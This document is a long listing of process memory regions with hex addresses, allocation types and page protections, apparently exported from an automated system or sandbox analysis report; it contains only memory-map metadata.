4E5A000
heap
page read and write
7FE8B55D000
trusted library allocation
page execute and read and write
384000
heap
page read and write
5194000
heap
page read and write
4E46000
heap
page read and write
5057000
heap
page read and write
4E39000
heap
page read and write
7FE89AA4000
trusted library allocation
page read and write
1D30000
direct allocation
page read and write
34B000
heap
page read and write
4DF7000
heap
page read and write
518D000
heap
page read and write
504D000
heap
page read and write
200000
heap
page read and write
5029000
heap
page read and write
4FD9000
heap
page read and write
50F9000
heap
page read and write
4ECB000
heap
page read and write
5072000
heap
page read and write
7FE8995C000
trusted library allocation
page execute and read and write
1C270000
heap
page read and write
311000
heap
page read and write
4B7A000
heap
page read and write
4B78000
heap
page read and write
4ACD000
heap
page read and write
50E6000
heap
page read and write
7FE89C04000
trusted library allocation
page read and write
4FA9000
heap
page read and write
50D8000
heap
page read and write
38A000
heap
page read and write
4E36000
heap
page read and write
4AEE000
heap
page read and write
1C600000
heap
page read and write
498B000
heap
page read and write
5094000
heap
page read and write
2F50000
remote allocation
page read and write
4FB4000
heap
page read and write
DE0000
trusted library allocation
page read and write
455000
heap
page read and write
4EE5000
heap
page read and write
5BC000
stack
page read and write
4E07000
heap
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
4D71000
heap
page read and write
381000
heap
page read and write
3A8000
heap
page read and write
4E1D000
heap
page read and write
5046000
heap
page read and write
4F83000
heap
page read and write
344000
heap
page read and write
5000000
heap
page read and write
4FFA000
heap
page read and write
4FDB000
heap
page read and write
1A809000
heap
page read and write
3784000
heap
page read and write
517D000
heap
page read and write
5088000
heap
page read and write
4DFC000
heap
page read and write
502A000
heap
page read and write
4E99000
heap
page read and write
4DBF000
heap
page read and write
519F000
heap
page read and write
500A000
heap
page read and write
F0000
heap
page read and write
4E41000
heap
page read and write
318000
stack
page read and write
46F000
heap
page read and write
37F000
heap
page read and write
1C26F000
stack
page read and write
455000
heap
page read and write
4B6F000
heap
page read and write
5020000
heap
page read and write
346000
heap
page read and write
50B5000
heap
page read and write
454000
heap
page read and write
357000
heap
page read and write
4F03000
heap
page read and write
4DF6000
heap
page read and write
395000
heap
page read and write
350000
heap
page read and write
4D46000
heap
page read and write
12E000
heap
page read and write
4F0C000
heap
page read and write
1C18B000
heap
page read and write
4FCE000
heap
page read and write
503A000
heap
page read and write
360000
direct allocation
page read and write
4FDC000
heap
page read and write
4E1F000
heap
page read and write
4E4F000
heap
page read and write
506A000
heap
page read and write
50BF000
heap
page read and write
10000
heap
page read and write
4FF9000
heap
page read and write
4E5A000
heap
page read and write
3A8000
heap
page read and write
4E60000
heap
page read and write
4D9E000
heap
page read and write
5011000
heap
page read and write
381000
heap
page read and write
4D6A000
heap
page read and write
4E76000
heap
page read and write
5087000
heap
page read and write
4D70000
heap
page read and write
5115000
heap
page read and write
4E58000
heap
page read and write
4D9F000
heap
page read and write
5066000
heap
page read and write
4F65000
heap
page read and write
5000000
heap
page read and write
3AE000
heap
page read and write
35F0000
trusted library allocation
page read and write
B80000
heap
page read and write
7FE8B6DA000
trusted library allocation
page read and write
506F000
heap
page read and write
51AE000
heap
page read and write
495000
heap
page read and write
355000
heap
page read and write
502B000
heap
page read and write
4FF1000
heap
page read and write
3A40000
trusted library allocation
page read and write
4DC8000
heap
page read and write
4CE000
heap
page read and write
4DF6000
heap
page read and write
1E0000
heap
page read and write
4E29000
heap
page read and write
37B000
heap
page read and write
4DF8000
heap
page read and write
399000
heap
page read and write
4A04000
heap
page read and write
4DAD000
heap
page read and write
1A7EF000
heap
page read and write
4B2B000
heap
page read and write
512E000
heap
page read and write
12C000
heap
page read and write
37B000
heap
page read and write
4E15000
heap
page read and write
36FD000
heap
page read and write
3F9000
heap
page read and write
50F9000
heap
page read and write
379D000
heap
page read and write
4EC5000
heap
page read and write
4E89000
heap
page read and write
40B0000
heap
page read and write
36A000
heap
page read and write
372000
heap
page read and write
4EE2000
heap
page read and write
3E0000
heap
page read and write
4B48000
heap
page read and write
1B1D0000
heap
page read and write
4E45000
heap
page read and write
389E000
stack
page read and write
4F9E000
heap
page read and write
4D74000
heap
page read and write
4F7E000
heap
page read and write
4D51000
heap
page read and write
4EC7000
heap
page read and write
35EA000
stack
page read and write
4F7A000
heap
page read and write
12616000
trusted library allocation
page read and write
4DD3000
heap
page read and write
502A000
heap
page read and write
360000
heap
page read and write
29D3000
trusted library allocation
page read and write
4E18000
heap
page read and write
4E42000
heap
page read and write
3718000
heap
page read and write
1C08D000
stack
page read and write
5000000
heap
page read and write
44A000
heap
page read and write
5043000
heap
page read and write
4FF1000
heap
page read and write
5034000
heap
page read and write
4D55000
heap
page read and write
4DF7000
heap
page read and write
37E000
heap
page read and write
381000
heap
page read and write
512B000
heap
page read and write
36FD000
heap
page read and write
4FC3000
heap
page read and write
7FE8B616000
trusted library allocation
page execute and read and write
4E51000
heap
page read and write
4EBB000
heap
page read and write
4FEA000
heap
page read and write
38B000
heap
page read and write
4E9B000
heap
page read and write
4ED2000
heap
page read and write
4D82000
heap
page read and write
4B76000
heap
page read and write
4F08000
heap
page read and write
51A2000
heap
page read and write
4F90000
heap
page read and write
34A000
heap
page read and write
5023000
heap
page read and write
4E79000
heap
page read and write
7FE89BBD000
trusted library allocation
page read and write
36A000
heap
page read and write
20000
heap
page read and write
740000
heap
page read and write
10000
heap
page read and write
50CC000
heap
page read and write
4DFB000
heap
page read and write
4D5F000
heap
page read and write
3E6A000
trusted library allocation
page read and write
4E84000
heap
page read and write
43A000
heap
page read and write
4EF0000
heap
page read and write
4D9F000
heap
page read and write
46F000
heap
page read and write
4B7A000
heap
page read and write
5114000
heap
page read and write
5016000
heap
page read and write
38C000
heap
page read and write
4E99000
heap
page read and write
4ED6000
heap
page read and write
4E61000
heap
page read and write
4D89000
heap
page read and write
4B75000
heap
page read and write
1C2BD000
heap
page read and write
4FA1000
heap
page read and write
16D000
stack
page read and write
4FFE000
heap
page read and write
382000
heap
page read and write
4B43000
heap
page read and write
7FE8B53D000
trusted library allocation
page execute and read and write
12F41000
trusted library allocation
page read and write
4E2A000
heap
page read and write
4DCD000
heap
page read and write
353000
heap
page read and write
339000
heap
page read and write
7FE89C20000
trusted library allocation
page read and write
50AD000
heap
page read and write
1A7A0000
heap
page read and write
4D80000
heap
page read and write
3B0000
heap
page read and write
51AE000
heap
page read and write
4DC9000
heap
page read and write
230000
heap
page read and write
4D9E000
heap
page read and write
4FCB000
heap
page read and write
308F000
stack
page read and write
43A000
heap
page read and write
4E78000
heap
page read and write
4FC1000
heap
page read and write
4EC1000
heap
page read and write
4D4F000
heap
page read and write
4E72000
heap
page read and write
502B000
heap
page read and write
4FA7000
heap
page read and write
4E00000
heap
page read and write
5076000
heap
page read and write
4D85000
heap
page read and write
4E0C000
heap
page read and write
4ECB000
heap
page read and write
4F89000
heap
page read and write
4E9B000
heap
page read and write
1A969000
stack
page read and write
5116000
heap
page read and write
4B78000
heap
page read and write
28E000
heap
page read and write
50CE000
heap
page read and write
51A1000
heap
page read and write
4F7A000
heap
page read and write
4F98000
heap
page read and write
4D90000
heap
page read and write
4FEF000
heap
page read and write
30AF000
trusted library allocation
page read and write
4DB8000
heap
page read and write
4D7B000
heap
page read and write
50CC000
heap
page read and write
4DE8000
heap
page read and write
4FDB000
heap
page read and write
4F08000
heap
page read and write
33E000
heap
page read and write
4E45000
heap
page read and write
4FFE000
heap
page read and write
4EA2000
heap
page read and write
3799000
heap
page read and write
4D4D000
heap
page read and write
4D49000
heap
page read and write
4E62000
heap
page read and write
4E60000
heap
page read and write
4DFB000
heap
page read and write
4B45000
heap
page read and write
1B520000
heap
page execute and read and write
5078000
heap
page read and write
380000
heap
page read and write
4EC0000
heap
page read and write
352000
heap
page read and write
4D5E000
heap
page read and write
4E6D000
heap
page read and write
5071000
heap
page read and write
4981000
heap
page read and write
4D9B000
heap
page read and write
4D51000
heap
page read and write
3724000
heap
page read and write
4A01000
heap
page read and write
517F000
heap
page read and write
49B000
heap
page read and write
4FFA000
heap
page read and write
5078000
heap
page read and write
516E000
heap
page read and write
3A8000
heap
page read and write
3EB0000
heap
page read and write
4E64000
heap
page read and write
395000
heap
page read and write
5194000
heap
page read and write
4B48000
heap
page read and write
4DA000
heap
page read and write
4EDE000
heap
page read and write
2F6D000
trusted library allocation
page read and write
23FA000
stack
page read and write
4FC8000
heap
page read and write
4F2D000
heap
page read and write
1C10C000
stack
page read and write
4DE4000
heap
page read and write
510F000
heap
page read and write
7FE8B5F0000
trusted library allocation
page execute and read and write
4E56000
heap
page read and write
4DED000
heap
page read and write
7FE89A82000
trusted library allocation
page read and write
1F9000
heap
page read and write
4FEC000
heap
page read and write
5116000
heap
page read and write
39C000
heap
page read and write
4E31000
heap
page read and write
508C000
heap
page read and write
36A000
heap
page read and write
39F000
heap
page read and write
34B000
heap
page read and write
1C0000
trusted library allocation
page read and write
356000
heap
page read and write
394000
heap
page read and write
26C000
stack
page read and write
4B78000
heap
page read and write
2CB0000
heap
page read and write
4FF5000
heap
page read and write
4E99000
heap
page read and write
5054000
heap
page read and write
4A01000
heap
page read and write
4DA8000
heap
page read and write
4E5B000
heap
page read and write
4E43000
heap
page read and write
3725000
heap
page read and write
4D8A000
heap
page read and write
501B000
heap
page read and write
36B3000
heap
page read and write
4FD1000
heap
page read and write
508F000
heap
page read and write
51A7000
heap
page read and write
3D70000
heap
page read and write
11CE000
unkown
page readonly
4DD3000
heap
page read and write
4F2F000
heap
page read and write
349000
heap
page read and write
3796000
heap
page read and write
504B000
heap
page read and write
4FA0000
heap
page read and write
5083000
heap
page read and write
4D68000
heap
page read and write
7FE89AB0000
trusted library allocation
page read and write
4E60000
heap
page read and write
50CC000
heap
page read and write
280000
heap
page read and write
1B0BF000
stack
page read and write
4FEA000
heap
page read and write
4ED8000
heap
page read and write
4DF3000
heap
page read and write
50AB000
heap
page read and write
7FE89A60000
trusted library allocation
page execute and read and write
5032000
heap
page read and write
BD0000
direct allocation
page execute and read and write
503D000
heap
page read and write
3A3000
heap
page read and write
4660000
trusted library allocation
page read and write
4D83000
heap
page read and write
2F6B000
trusted library allocation
page read and write
4B50000
heap
page read and write
25000
heap
page read and write
382000
heap
page read and write
1FB3000
direct allocation
page read and write
4E01000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
5172000
heap
page read and write
124E1000
trusted library allocation
page read and write
4F7000
heap
page read and write
3EB000
heap
page read and write
50F6000
heap
page read and write
2780000
heap
page read and write
4E8F000
heap
page read and write
393000
heap
page read and write
3738000
heap
page read and write
4F90000
heap
page read and write
339000
heap
page read and write
4EFB000
heap
page read and write
4FE0000
heap
page read and write
4F08000
heap
page read and write
387000
heap
page read and write
FD000
heap
page read and write
3A8000
heap
page read and write
3DB000
heap
page read and write
53B0000
heap
page read and write
4E4D000
heap
page read and write
50CE000
heap
page read and write
50E1000
heap
page read and write
4E31000
heap
page read and write
36A0000
heap
page read and write
4EEE000
heap
page read and write
361000
heap
page read and write
394000
heap
page read and write
50CB000
heap
page read and write
5054000
heap
page read and write
C0000
heap
page read and write
4DF7000
heap
page read and write
4D74000
heap
page read and write
50AB000
heap
page read and write
4E67000
heap
page read and write
4AF0000
heap
page read and write
504D000
heap
page read and write
4E87000
heap
page read and write
4E2A000
heap
page read and write
50B1000
heap
page read and write
4E01000
heap
page read and write
3098000
trusted library allocation
page read and write
4B2B000
heap
page read and write
4E6A000
heap
page read and write
4E9A000
heap
page read and write
4DFC000
heap
page read and write
50C4000
heap
page read and write
4F5B000
heap
page read and write
5048000
heap
page read and write
4FAC000
heap
page read and write
5196000
heap
page read and write
517D000
heap
page read and write
4DF2000
heap
page read and write
4B7A000
heap
page read and write
1C16000
heap
page read and write
4E2B000
heap
page read and write
4FD9000
heap
page read and write
506A000
heap
page read and write
4E96000
heap
page read and write
506D000
heap
page read and write
4F8F000
heap
page read and write
1AF4E000
stack
page read and write
3BF000
direct allocation
page read and write
46B000
heap
page read and write
4D64000
heap
page read and write
7FE89AA8000
trusted library allocation
page read and write
455000
heap
page read and write
4FE2000
heap
page read and write
4DCF000
heap
page read and write
4F93000
heap
page read and write
4EFB000
heap
page read and write
5077000
heap
page read and write
2780000
heap
page read and write
4E61000
heap
page read and write
4FC0000
heap
page read and write
4D84000
heap
page read and write
4FC9000
heap
page read and write
1A87E000
heap
page execute and read and write
4F1F000
heap
page read and write
50FC000
heap
page read and write
4B51000
heap
page read and write
4AF7000
heap
page read and write
4E00000
heap
page read and write
4EF4000
heap
page read and write
5110000
heap
page read and write
4F15000
heap
page read and write
4F01000
heap
page read and write
7FE89A90000
trusted library allocation
page execute and read and write
43A000
heap
page read and write
50EC000
heap
page read and write
4EBF000
heap
page read and write
505B000
heap
page read and write
4F83000
heap
page read and write
4E2B000
heap
page read and write
1B580000
heap
page read and write
4E2E000
heap
page read and write
3F6000
heap
page read and write
4EFF000
heap
page read and write
50C6000
heap
page read and write
46F000
heap
page read and write
4DE3000
heap
page read and write
378B000
heap
page read and write
4E73000
heap
page read and write
5007000
heap
page read and write
4E32000
heap
page read and write
4ED4000
heap
page read and write
4FCF000
heap
page read and write
7FE89C40000
trusted library allocation
page read and write
1C51E000
stack
page read and write
503E000
heap
page read and write
506D000
heap
page read and write
4DF6000
heap
page read and write
4FED000
heap
page read and write
5039000
heap
page read and write
2BE4000
trusted library allocation
page read and write
51A4000
heap
page read and write
7FE8B544000
trusted library allocation
page read and write
50AA000
heap
page read and write
4E44000
heap
page read and write
4FFC000
heap
page read and write
2D50000
heap
page read and write
287000
heap
page read and write
4F35000
heap
page read and write
4B4F000
heap
page read and write
4F50000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
4E5F000
heap
page read and write
4AF3000
heap
page read and write
1160000
unkown
page readonly
5080000
heap
page read and write
7FE899C0000
trusted library allocation
page execute and read and write
369000
heap
page read and write
50BF000
heap
page read and write
5006000
heap
page read and write
4FF9000
heap
page read and write
5094000
heap
page read and write
504E000
heap
page read and write
46B000
heap
page read and write
5113000
heap
page read and write
4EE5000
heap
page read and write
4FDF000
heap
page read and write
3A8000
heap
page read and write
406000
heap
page read and write
12B57000
trusted library allocation
page read and write
4ED0000
heap
page read and write
4FC4000
heap
page read and write
5038000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
33D000
heap
page read and write
1ED000
heap
page read and write
518C000
heap
page read and write
4DFD000
heap
page read and write
4EF3000
heap
page read and write
4DDA000
heap
page read and write
4E21000
heap
page read and write
505A000
heap
page read and write
36B7000
heap
page read and write
4DC2000
heap
page read and write
5076000
heap
page read and write
51A0000
heap
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
4E2E000
heap
page read and write
5049000
heap
page read and write
455000
heap
page read and write
5065000
heap
page read and write
3788000
heap
page read and write
4E42000
heap
page read and write
4CB1000
heap
page read and write
4FFC000
heap
page read and write
4E99000
heap
page read and write
4DD2000
heap
page read and write
50D4000
heap
page read and write
4DFC000
heap
page read and write
1E40000
heap
page read and write
7FFFFF20000
trusted library allocation
page execute and read and write
4E3D000
heap
page read and write
4E79000
heap
page read and write
50E3000
heap
page read and write
4DA6000
heap
page read and write
4DBE000
heap
page read and write
395000
heap
page read and write
349000
heap
page read and write
4D52000
heap
page read and write
50F7000
heap
page read and write
386000
heap
page read and write
2B51000
trusted library allocation
page read and write
4FEA000
heap
page read and write
5175000
heap
page read and write
5053000
heap
page read and write
4FCE000
heap
page read and write
387000
heap
page read and write
4D63000
heap
page read and write
358000
heap
page read and write
4D85000
heap
page read and write
4DC000
heap
page read and write
350000
heap
page read and write
4EC4000
heap
page read and write
7FE89A40000
trusted library allocation
page read and write
500A000
heap
page read and write
36FF000
heap
page read and write
50A8000
heap
page read and write
1E30000
heap
page execute and read and write
380000
heap
page read and write
30E000
heap
page read and write
4E39000
heap
page read and write
353000
heap
page read and write
502C000
heap
page read and write
4DF1000
heap
page read and write
351000
heap
page read and write
4AA3000
heap
page read and write
1B36C000
stack
page read and write
36D000
heap
page read and write
391000
heap
page read and write
4EF0000
heap
page read and write
366000
heap
page read and write
4DB1000
heap
page read and write
4ED3000
heap
page read and write
320000
trusted library allocation
page read and write
4EBE000
heap
page read and write
508D000
heap
page read and write
5062000
heap
page read and write
4DFA000
heap
page read and write
4E6A000
heap
page read and write
4B54000
heap
page read and write
4DF3000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
364000
heap
page read and write
502D000
heap
page read and write
3798000
heap
page read and write
506D000
heap
page read and write
1D94F000
stack
page read and write
5194000
heap
page read and write
3A0000
direct allocation
page read and write
2780000
heap
page read and write
516C000
heap
page read and write
4EBB000
heap
page read and write
4F07000
heap
page read and write
4E4F000
heap
page read and write
5194000
heap
page read and write
4D9E000
heap
page read and write
1FA0000
direct allocation
page read and write
3AC000
heap
page read and write
35A000
heap
page read and write
4D7F000
heap
page read and write
368000
heap
page read and write
50AD000
heap
page read and write
4EF000
heap
page read and write
4FB4000
heap
page read and write
4D60000
heap
page read and write
5076000
heap
page read and write
50F4000
heap
page read and write
D30000
heap
page execute and read and write
4EC6000
heap
page read and write
4E54000
heap
page read and write
4B4D000
heap
page read and write
5053000
heap
page read and write
4F17000
heap
page read and write
4B4F000
heap
page read and write
12E75000
trusted library allocation
page read and write
4FFB000
heap
page read and write
4FB1000
heap
page read and write
4E2F000
heap
page read and write
4E87000
heap
page read and write
33C000
heap
page read and write
4F2D000
heap
page read and write
4DFB000
heap
page read and write
508D000
heap
page read and write
A50000
direct allocation
page execute and read and write
36FF000
heap
page read and write
377A000
heap
page read and write
504D000
heap
page read and write
5062000
heap
page read and write
4B71000
heap
page read and write
4EF5000
heap
page read and write
4F05000
heap
page read and write
4EC2000
heap
page read and write
371000
heap
page read and write
4E8A000
heap
page read and write
4F32000
heap
page read and write
4D46000
heap
page read and write
4AE9000
heap
page read and write
51A2000
heap
page read and write
5039000
heap
page read and write
4E0C000
heap
page read and write
1C3CB000
heap
page read and write
4E75000
heap
page read and write
4FE0000
heap
page read and write
50BF000
heap
page read and write
39A000
heap
page read and write
4F23000
heap
page read and write
1A848000
heap
page execute and read and write
4EBA000
heap
page read and write
3F9000
heap
page read and write
4FE3000
heap
page read and write
4FF2000
heap
page read and write
4D85000
heap
page read and write
10000
heap
page read and write
4E32000
heap
page read and write
3724000
heap
page read and write
510F000
heap
page read and write
4E26000
heap
page read and write
5079000
heap
page read and write
4F9A000
heap
page read and write
C7000
heap
page read and write
4E3F000
heap
page read and write
50BF000
heap
page read and write
4DB1000
heap
page read and write
5086000
heap
page read and write
50F5000
heap
page read and write
4DF8000
heap
page read and write
5015000
heap
page read and write
5192000
heap
page read and write
5094000
heap
page read and write
4F0B000
heap
page read and write
519F000
heap
page read and write
4DCF000
heap
page read and write
7FE8B6F0000
trusted library allocation
page read and write
7B7000
heap
page read and write
4FD0000
heap
page read and write
321000
heap
page read and write
394000
heap
page read and write
7FE89C60000
trusted library allocation
page read and write
5055000
heap
page read and write
4E8D000
heap
page read and write
140000
heap
page read and write
12E70000
trusted library allocation
page read and write
3AE000
heap
page read and write
33C000
heap
page read and write
5078000
heap
page read and write
4E34000
heap
page read and write
5088000
heap
page read and write
4F0D000
heap
page read and write
3B73000
heap
page read and write
7FE89C38000
trusted library allocation
page read and write
361000
heap
page read and write
3F9000
heap
page read and write
4D4F000
heap
page read and write
4E78000
heap
page read and write
4F9B000
heap
page read and write
5002000
heap
page read and write
4E59000
heap
page read and write
4FEE000
heap
page read and write
502A000
heap
page read and write
4E99000
heap
page read and write
3A8000
heap
page read and write
4E3B000
heap
page read and write
50F9000
heap
page read and write
5091000
heap
page read and write
36BA000
heap
page read and write
505A000
heap
page read and write
4EFD000
heap
page read and write
4DC3000
heap
page read and write
4FA2000
heap
page read and write
4D97000
heap
page read and write
51AA000
heap
page read and write
4E64000
heap
page read and write
1F0000
heap
page read and write
1BD5D000
heap
page read and write
4F4B000
heap
page read and write
4F99000
heap
page read and write
120000
heap
page read and write
1A772000
heap
page read and write
4FD4000
heap
page read and write
4D9D000
heap
page read and write
5078000
heap
page read and write
4ECB000
heap
page read and write
4DEF000
heap
page read and write
4F64000
heap
page read and write
4D44000
heap
page read and write
1D70000
direct allocation
page read and write
4E05000
heap
page read and write
4A78000
heap
page read and write
1C395000
heap
page read and write
344000
heap
page read and write
1DA4000
heap
page read and write
5028000
heap
page read and write
7FE898A4000
trusted library allocation
page read and write
4F09000
heap
page read and write
4D9D000
heap
page read and write
1C87B000
stack
page read and write
4D79000
heap
page read and write
5015000
heap
page read and write
5027000
heap
page read and write
30F000
heap
page read and write
5054000
heap
page read and write
4E40000
heap
page read and write
4D67000
heap
page read and write
4EDC000
heap
page read and write
3A3000
heap
page read and write
399000
heap
page read and write
383000
heap
page read and write
356000
heap
page read and write
4FC6000
heap
page read and write
4F85000
heap
page read and write
4E96000
heap
page read and write
4FDB000
heap
page read and write
4AF3000
heap
page read and write
339000
heap
page read and write
4EC2000
heap
page read and write
2B4F000
stack
page read and write
2EA000
heap
page read and write
1FA7000
direct allocation
page read and write
3AE000
heap
page read and write
4E31000
heap
page read and write
4DDF000
heap
page read and write
4E34000
heap
page read and write
4DF0000
heap
page read and write
A40000
direct allocation
page execute and read and write
4FE8000
heap
page read and write
4DFC000
heap
page read and write
4FC7000
heap
page read and write
7FE898A2000
trusted library allocation
page read and write
7FE89A57000
trusted library allocation
page read and write
2430000
heap
page read and write
50EA000
heap
page read and write
5012000
heap
page read and write
4F2D000
heap
page read and write
4DFA000
heap
page read and write
3786000
heap
page read and write
4D99000
heap
page read and write
4DC6000
heap
page read and write
4EC8000
heap
page read and write
39E000
heap
page read and write
44E000
heap
page read and write
5076000
heap
page read and write
50EC000
heap
page read and write
50A5000
heap
page read and write
2C34000
heap
page read and write
2BE000
heap
page read and write
311000
heap
page read and write
4E0E000
heap
page read and write
3B60000
heap
page read and write
4DFF000
heap
page read and write
4EC7000
heap
page read and write
4EC4000
heap
page read and write
4F7000
heap
page read and write
502F000
heap
page read and write
39E000
heap
page read and write
4E79000
heap
page read and write
3A7000
direct allocation
page read and write
5071000
heap
page read and write
3BE0000
trusted library allocation
page read and write
4D9D000
heap
page read and write
7FE89B95000
trusted library allocation
page read and write
1DC0000
heap
page read and write
4E3E000
heap
page read and write
516D000
heap
page read and write
502A000
heap
page read and write
7FE89C70000
trusted library allocation
page read and write
4FD9000
heap
page read and write
4EFF000
heap
page read and write
3162000
trusted library allocation
page read and write
4D6B000
heap
page read and write
4EC6000
heap
page read and write
4F94000
heap
page read and write
4F8C000
heap
page read and write
1A840000
heap
page execute and read and write
381000
heap
page read and write
4EEF000
heap
page read and write
4ED1000
heap
page read and write
4FFC000
heap
page read and write
3C20000
trusted library allocation
page read and write
4F7C000
heap
page read and write
51AC000
heap
page read and write
4AF3000
heap
page read and write
12B51000
trusted library allocation
page read and write
456000
heap
page read and write
4FD9000
heap
page read and write
387000
heap
page read and write
3E20000
trusted library allocation
page read and write
4DE7000
heap
page read and write
455000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
3719000
heap
page read and write
506B000
heap
page read and write
373000
heap
page read and write
4EC9000
heap
page read and write
4E68000
heap
page read and write
4180000
heap
page read and write
12D7B000
trusted library allocation
page read and write
5194000
heap
page read and write
50E6000
heap
page read and write
4D42000
heap
page read and write
4F7D000
heap
page read and write
391000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
38B000
heap
page read and write
517F000
heap
page read and write
4FA0000
heap
page read and write
3798000
heap
page read and write
3724000
heap
page read and write
4F8C000
heap
page read and write
47C000
heap
page read and write
36E000
heap
page read and write
50BE000
heap
page read and write
4DB7000
heap
page read and write
7FE89C1D000
trusted library allocation
page read and write
4FBB000
heap
page read and write
7FE89C1A000
trusted library allocation
page read and write
1B26B000
heap
page read and write
447E000
stack
page read and write
508C000
heap
page read and write
311000
heap
page read and write
502B000
heap
page read and write
3B30000
heap
page read and write
4B78000
heap
page read and write
4DAA000
heap
page read and write
2F69000
trusted library allocation
page read and write
4E31000
heap
page read and write
4FCA000
heap
page read and write
4F0C000
heap
page read and write
4F18000
heap
page read and write
4D67000
heap
page read and write
30E000
heap
page read and write
5015000
heap
page read and write
34B000
heap
page read and write
1B2ED000
stack
page read and write
5008000
heap
page read and write
5047000
heap
page read and write
3095000
trusted library allocation
page read and write
4F0E000
heap
page read and write
8E0000
trusted library section
page read and write
46B000
heap
page read and write
4ED7000
heap
page read and write
5055000
heap
page read and write
418000
heap
page read and write
7FE89A70000
trusted library allocation
page execute and read and write
4D6F000
heap
page read and write
4B4D000
heap
page read and write
3B90000
heap
page read and write
7FE89B50000
trusted library allocation
page read and write
37B000
heap
page read and write
4EE5000
heap
page read and write
342000
heap
page read and write
4E31000
heap
page read and write
4D8F000
heap
page read and write
4FD9000
heap
page read and write
4D81000
heap
page read and write
4EA5000
heap
page read and write
504E000
heap
page read and write
BB0000
direct allocation
page execute and read and write
4FE1000
heap
page read and write
3D2000
heap
page read and write
4F0C000
heap
page read and write
4FA7000
heap
page read and write
50D4000
heap
page read and write
5025000
heap
page read and write
3FB000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
4E66000
heap
page read and write
4FB7000
heap
page read and write
4D6C000
heap
page read and write
5027000
heap
page read and write
1C2B5000
heap
page read and write
4FEC000
heap
page read and write
4D44000
heap
page read and write
4E4F000
heap
page read and write
4E60000
heap
page read and write
5012000
heap
page read and write
4E6D000
heap
page read and write
4F83000
heap
page read and write
7FE8B702000
trusted library allocation
page read and write
507B000
heap
page read and write
4DC7000
heap
page read and write
5199000
heap
page read and write
365000
heap
page read and write
4D93000
heap
page read and write
4F7C000
heap
page read and write
4F00000
heap
page read and write
10000
heap
page read and write
4FD0000
heap
page read and write
4D56000
heap
page read and write
4EC9000
heap
page read and write
4FC5000
heap
page read and write
1BA5F000
stack
page read and write
4FA7000
heap
page read and write
34A000
heap
page read and write
345000
heap
page read and write
50A7000
heap
page read and write
37B000
heap
page read and write
4E63000
heap
page read and write
4B4D000
heap
page read and write
1C2BB000
heap
page read and write
4DCA000
heap
page read and write
434E000
stack
page read and write
4A3E000
heap
page read and write
508A000
heap
page read and write
1E76000
heap
page read and write
3A8000
heap
page read and write
4B75000
heap
page read and write
5175000
heap
page read and write
5037000
heap
page read and write
4D71000
heap
page read and write
3738000
heap
page read and write
4D78000
heap
page read and write
4B6F000
heap
page read and write
4D93000
heap
page read and write
4FE2000
heap
page read and write
22D000
stack
page read and write
4E64000
heap
page read and write
38E000
heap
page read and write
2F67000
trusted library allocation
page read and write
50BE000
heap
page read and write
5039000
heap
page read and write
1F80000
direct allocation
page read and write
2D0000
heap
page read and write
4E20000
heap
page read and write
1D10000
trusted library allocation
page read and write
4FBE000
heap
page read and write
7FE8B540000
trusted library allocation
page read and write
4E3F000
heap
page read and write
4FD9000
heap
page read and write
4B45000
heap
page read and write
4F0C000
heap
page read and write
7FE898B3000
trusted library allocation
page read and write
5045000
heap
page read and write
455000
heap
page read and write
5034000
heap
page read and write
54D9000
heap
page read and write
5031000
heap
page read and write
4FC3000
heap
page read and write
4E20000
heap
page read and write
1DA0000
heap
page read and write
4660000
trusted library allocation
page read and write
36C000
heap
page read and write
7FE89BC0000
trusted library allocation
page read and write
381000
heap
page read and write
1B235000
heap
page read and write
4E5B000
heap
page read and write
36F000
trusted library allocation
page read and write
385000
heap
page read and write
4D70000
heap
page read and write
501A000
heap
page read and write
4FE2000
heap
page read and write
4D6000
heap
page read and write
4ED0000
heap
page read and write
4EFE000
heap
page read and write
4B74000
heap
page read and write
50D9000
heap
page read and write
5094000
heap
page read and write
4EEE000
heap
page read and write
4E12000
heap
page read and write
4D4C000
heap
page read and write
4B3000
heap
page read and write
3B6000
heap
page read and write
4EF6000
heap
page read and write
43F000
heap
page read and write
4B74000
heap
page read and write
1C2C1000
heap
page read and write
4D75000
heap
page read and write
382000
heap
page read and write
860000
heap
page read and write
F20000
heap
page read and write
4E94000
heap
page read and write
7FE898AD000
trusted library allocation
page execute and read and write
4FC5000
heap
page read and write
4D8000
heap
page read and write
355000
heap
page read and write
1C3F0000
heap
page read and write
4E29000
heap
page read and write
144000
heap
page read and write
51A6000
heap
page read and write
4E28000
heap
page read and write
4F9E000
heap
page read and write
506D000
heap
page read and write
5182000
heap
page read and write
506D000
heap
page read and write
5078000
heap
page read and write
30F000
heap
page read and write
1F60000
direct allocation
page read and write
4FED000
heap
page read and write
7FE89A84000
trusted library allocation
page read and write
4F48000
heap
page read and write
4E4B000
heap
page read and write
4E45000
heap
page read and write
4DB5000
heap
page read and write
B30000
direct allocation
page execute and read and write
4E38000
heap
page read and write
34B000
heap
page read and write
39C000
heap
page read and write
4E4D000
heap
page read and write
4E84000
heap
page read and write
38C000
heap
page read and write
455000
heap
page read and write
CC7000
direct allocation
page execute and read and write
505B000
heap
page read and write
125000
stack
page read and write
7FE898A3000
trusted library allocation
page execute and read and write
4EBB000
heap
page read and write
5033000
heap
page read and write
4E60000
heap
page read and write
250D000
trusted library allocation
page read and write
50F4000
heap
page read and write
4E96000
heap
page read and write
12C3E000
trusted library allocation
page read and write
4B45000
heap
page read and write
51A8000
heap
page read and write
3A2000
heap
page read and write
4EBC000
heap
page read and write
4E67000
heap
page read and write
510000
heap
page read and write
4E51000
heap
page read and write
491000
heap
page read and write
4B7A000
heap
page read and write
50A2000
heap
page read and write
37E000
heap
page read and write
2F65000
trusted library allocation
page read and write
5188000
heap
page read and write
381000
heap
page read and write
4DA5000
heap
page read and write
4B4F000
heap
page read and write
4FD8000
heap
page read and write
36AC000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
3F9000
heap
page read and write
4EA6000
heap
page read and write
1C7AF000
stack
page read and write
4D63000
heap
page read and write
5127000
heap
page read and write
7FE89CC0000
trusted library allocation
page read and write
4EBB000
heap
page read and write
4F1E000
heap
page read and write
4B2B000
heap
